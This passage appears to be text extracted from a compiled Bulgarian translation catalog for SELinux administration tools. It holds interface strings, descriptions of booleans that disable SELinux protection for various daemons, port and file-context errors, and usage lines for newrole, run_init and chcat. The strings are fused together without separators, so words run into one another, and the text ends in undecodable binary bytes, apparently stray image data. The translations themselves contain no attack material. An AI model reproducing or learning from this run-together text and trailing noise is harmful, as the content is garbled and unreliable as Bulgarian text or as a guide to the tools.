демона mysqldИзключване на SELinux защитата за демона nagiosИзключване на SELinux защитата за демона namedИзключване на SELinux защитата за демона nessusdИзключване на SELinux защитата за демона nfsdИзключване на SELinux защитата за демона nmbdИзключване на SELinux защитата за демона nrpeИзключване на SELinux защитата за демона nscdИзключване на SELinux защитата за демона nsdИзключване на SELinux защитата за демона ntpdИзключване на SELinux защитата за oddjobИзключване на SELinux защитата за oddjob_mkhomedirИзключване на SELinux защитата за демона openvpnИзключване на SELinux защитата за демона pamИзключване на SELinux защитата за pegasusИзключване на SELinux защитата за демона  perditionИзключване на SELinux защитата за демона portmapИзключване на SELinux защитата за демона portslaveИзключване на SELinux защитата за postfixИзключване на SELinux защитата за демона postgresqlИзключване на SELinux защитата за pptpИзключване на SELinux защитата за демона prelinkИзключване на SELinux защитата за демона privoxyИзключване на SELinux защитата за демона ptalИзключване на SELinux защитата за демона pxeИзключване на SELinux защитата за pyzordИзключване на SELinux защитата за демона quotaИзключване на SELinux защитата за демона radiusdИзключване на SELinux защитата за демона radvdИзключване на SELinux защитата за rdiscИзключване на SELinux защитата за readaheadИзключване на SELinux защитата за restorecondИзключване на SELinux защитата за демона rhgbИзключване на SELinux защитата за ricciИзключване на SELinux защитата за ricci_modclusterdИзключване на SELinux защитата за демона rlogindИзключване на SELinux защитата за демона rpcdИзключване на SELinux защитата за rshdИзключване на SELinux защитата за демона rsyncИзключване на SELinux защитата за демона saslauthdИзключване на SELinux защитата за демона scannerdaemonИзключване на SELinux защитата за демона sendmailИзключване на SELinux защитата за setransИзключване на SELinux защитата за демона slapdИзключване на SELinux защитата за демона slrnpullИзключване на SELinux защитата за демона smbdИзключване на SELinux защитата за демона snmpdИзключване на SELinux защитата за демона snortИзключване на SELinux защитата за демона soundИзключване на SELinux защитата за демона sounddИзключване на SELinux защитата за демона spamdИзключване на SELinux защитата за демона speedmgmtИзключване на SELinux защитата за демона squidИзключване на SELinux защитата за демона sshИзключване на SELinux защитата за демона stunnelИзключване на SELinux защитата за демона swatИзключване на SELinux защитата за демона sxidИзключване на SELinux защитата за демона syslogdИзключване на SELinux защитата за системните cron задачиИзключване на SELinux защитата за демона tcpИзключване на SELinux защитата за демона telnetИзключване на SELinux защитата за демона tftpdИзключване на SELinux защитата за уеб браузъритеИзключване на SELinux защитата за демона transproxyИзключване на SELinux защитата за демона udevИзключване на SELinux защитата за демона umlИзключване на SELinux защитата за демона updfstabИзключване на SELinux защитата за демона uptimedИзключване на SELinux защитата за демона uucpdИзключване на SELinux защитата за демона vmwareИзключване на SELinux защитата за демона watchdogИзключване на SELinux защитата за демона winbindИзключване на SELinux защитата за демона xdmИзключване на SELinux защитата за демона xenИзключване на SELinux защитата за демона xfsИзключване на SELinux защитата за демона ypbindИзключване на SELinux защитата за демона ypservИзключенЗабрана на всички процеси да зареждат модули в ядротоЗабрана на всички процеси да променят SELinux политиката в ядротоЗабрана за преход към sysadm_t, засягат се sudo и suДа не се прави одит на неща, които се знае че са счупени, но не представляват риск за сигурносттаРедакция на мрежов портВключване на одитаАктивенВъведете пълния път за изпълнимия файл за ограничаване.Въведете пълния път на init скрипта ползван за стартиране на ограничаваното приложение.Грешка при заделяне на памет.
Грешка при заделяне argv0 на обвивката.
Грешка при смяна на uid, авариен изход.
Грешка при връзка със системата за одит.
Грешка при отказ от SETUID права, авариен изход
Грешка при отказ от правата, авариен изход.
Грешка при освобождаване на права
Грешка при връщане на KEEPCAPS, авариен изход
Грешка при изпращане на одит съобщение.
Грешка при настройка на KEEPCAPS, авариен изход
Грешка при настройка на правата, авариен изход.
Грешка!  Не може да се отвори %s.
Грешка!  Обвивката не е валидна.
Грешка: указани са няколко нива
Грешка: указани са няколко роли
Грешка: указани са няколко типа
Изпълним файлНе може да се затвори tty коректно
Файлова
спецификацияФайлов
ТипФайл с контекстиЕтикиране на файлФайлова спецификацияФайлов типФайловия контекст за %s е дефиниран в политиката, не може да бъде изтритНе е дефиниран файлов контекст за %sФилтърОПЛИгриГенериране на нов модул с политикаГрупов прегледHTTPD услугаInit скриптИнтерфейс %s е дефиниран в политиката, не може да се изтриеИнтерфейс %s не е дефиниранИнтерфейсен файлДемони за Интернет услуги (inetd)Демони за Интернет услуги са демони, които се стартират от xinetdKerberosЕтикиранеLinux потребител %s не съществуваЗареждане на модул с политикаЗареждане на модул с политикаПотребителско
ИмеИзисква се '%s' за входПотребителско имеСъответствие за вход за %s е дефинирано в политиката, не може да бъде изтритоНе е дефинирано съответствие за вход за %sMCS нивоMCS интервалMLSMLS/MLS/
MCS интервалMLS/MCS
НивоMLS/MCS интервалЗащита на паметтаПромяна на %sПромяна на файлов контекстПромяна на SELinux съответствие за потребителИме на модулаМонтиранеNFSNISИмеУслуга за именаМрежова конфигурацияНяма контекст във файла %s
Грешка в опциите %s Паметта свърши!
Парола:ПасивенPolgenДиректория с политикиМодул с политикаПортПорт %s/%s вече е дефиниранПорт %s/%s е дефиниран в политиката, не може да се изтриеПорт %s/%s не е дефиниранНомер на портИзисква се портНомера на порт "%s" не е валиден.  0 < НОМЕР_НА_ПОРТ < 65536 ПрефиксПечатПротоколПротокол Изисква се протокол udp или tcpRed Hat 2007Преетикиране на следващия рестарт.Деактивиране на зареждаем модул с политикаИзисква поне една категорияИзисква префикс или ролиИзисква префикс, роли, ниво или диапазонНеобходим е setypeНеобходим е setype или serangeИзисква setype, serange или seuserИзисква seuser или serangeРоляSASL сървър за удостоверяванеSELinux
ПотребителSELinux администрацияSELinux интерфейсИнструмент за генериране на SELinux политикиSELinux
тип портSELinux тип портSELinux ролиSELinux защита на услугитеSELinux типНеобходим е SELinux типSELinux потребителSELinux булеваSELinux ф.контекстSELinux политиката не е управлявана или хранилището не е достъпно.SELinux потребител %s е дефиниран в политиката, не може да се изтриеSELinux потребител %s не е дефиниранНеобходим е SELinux потребител '%s'SSHSambaИзбор на обект за менажиранеИзбор на портовеИзберете директория в която да се генерират файловете на политикатаИзберете директориите които ограничаваното приложение притежава и в които то пишеИзберете изпълнимия файл за ограничаване.Изберете файл(овете) които ограничаваното приложение създава/пишеИзберете дали искате да преетикирате цялата файлова система на следващото рестартиране. Преетикирането може да отнеме много дълго време, в зависимост от размера на файловата система.  Ако променяте типове от политиката или преминавате от изключена към активна политика, то преетикирането е необходимо.Изберете init скрипта за ограничаване.Изберете домейните, които бихте искали този потребител да администрира.Настройващ скриптСъжаляваме, -l може да се ползва с поддръжка на SELinux MLS.
Съжаляваме, newrole може да се ползва само със SELinux ядро.
Съжаляваме, run_init може да се ползва само със SELinux ядро.
SquidСтандартен init демонСъстояниеОсновен режим на системата: Основен тип политика на системата: За да активирате този пакет с политика, изпълнете:Преход на staff SELinux потребителите към уеб браузър домейнаПреход на sysadm SELinux потребителите към уеб браузър домейнаПреход на user SELinux потребителите към уеб браузър домейнаПреход на xguest SELinux потребителите към уеб браузър домейнаИзисква се типУПОТРЕБА: run_init <скрипт> <аргументи ...>
  където: <скрипт> е името на инициализационния скрипт за изпълнение,
         <аргументи ...> са аргументите към този скрипт.Не може да се задели памет за нов_контекстНе може да бъде почистена средата
Не може да се определи празния набор сигнали
Не може да бъде възстановена средата, авариен изход
Не може да се възстанови етикета на tty...
Не може да се установи обработката на SIGHUP
Универсален SSL тунелНерезервирани портове (> 1024)Употреба %s -LУпотреба %s -L -l потребителУпотреба %s -d Файл ...Употреба %s -l -d потребител ...Употреба %s -l КАТЕГОРИЯ потребител ...Употреба %s -l [[+|-]КАТЕГОРИЯ],...]q потребител ...Употреба %s КАТЕГОРИЯ Файл ...Употреба %s [[+|-]КАТЕГОРИЯ],...]q Файл ...Ползвайте -- за кран на списъка с опции.  НапримерПотребителски приложенияПотребителски приложения са всички приложения, които бихте искали да ограничите, стартирани от потребителСъответствия за потребителПотребителски привилегииВерсияПредупреждение! Не може да се възстанови контекста на %s
Уеб приложения/Скриптове (CGI)Уеб приложенияУеб приложения/Скриптове (CGI) са скриптове стартирани от уеб сървъра (apache)XENXServerСледва да укажете изпълним файлТрябва да въведете пътя на изпълнимия файл за вашия ограничаван процес_Изтриване_Свойствавсички файлове
нормален файл
директория
знаково устройство
блоково устройство
гнездо
символна връзка
именована тръба
неуспешно удостоверяване.
не може да се намери валиден запис във файла passwd.
chcat -- -КонфиденциалноЗаКомпанията /документи/бизнесплан.odtchcat -l +КонфиденциалноЗаКомпанията спотребителгрешка при четене на конфигурацията на PAM услуга.
неуспешно изграждане на нов диапазон с ниво %s
неуспешно конвертиране на новия контекст към низ
неуспешно пускане на обвивката
неуспешно извличане на информация за акаунта
неуспешно извличане на нов контекст.
неуспешно извличане на стар_контекст.
неуспешна инициализация на PAM
неуспешна настройка на PAM_TTY
неуспешно установяване на нов диапазон %s
неуспешно установяване на нова роля %s
неуспешно установяване на нов тип %s
getpass не може да се отвори /dev/tty
label37label38label39label41label42label44label50newrole:  %s:  грешка на ред %lu.
newrole: неуспешно изпълнение на fork: %snewrole: грешна парола за %s
newrole: препълване на хеш таблицата на конфигурацията на услугата за имена
pppdrsyncrun_init: грешна парола за %s
system-config-selinuxDoncho N. Gunchev <gunchev@gmail.com>, 2007.типuse_syslog трябва да бъде булева стойност 
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`